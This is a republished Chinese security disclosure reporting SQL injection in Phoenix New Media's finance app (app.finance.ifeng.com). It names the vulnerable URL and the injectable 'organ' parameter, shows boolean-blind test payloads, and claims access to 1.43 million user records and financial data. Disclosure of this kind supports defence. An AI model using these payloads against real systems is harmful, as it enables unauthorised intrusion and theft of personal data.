频道栏目
首页 > 资讯 > 企业安全 > 正文

凤凰网app另一处SQL注入(涉及143W+用户信息/大量财务数据)

16-07-16        来源:[db:作者]  
收藏   我要投稿

目标:app.finance.ifeng.com

检测发现以下地方存在SQL注入:(注入参数organ,布尔盲注/union query)

http://app.finance.ifeng.com/wgsearch/index.php?code=600234&begin=2016-03-05&end=2016-05-31&organ=中国证券监督管理委员会

Payload:

organ=中国证券监督管理委员会' and 'a'='a

organ=中国证券监督管理委员会' and 'a'='b

1、当前数据库用户

 

user.jpg

 

2、所有数据库

 

dbs.jpg

 

3、数据表,涉及143W+用户信息/大量财务数据,仅以行数作证,具体就不深入了

 

0.jpg

 

 

1.jpg

 

 

2.jpg

 

 

4.jpg

 

解决方案:

请多指教~

相关TAG标签
上一篇:14.7InnoDBTableCompression
下一篇:webSocket使用教程
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站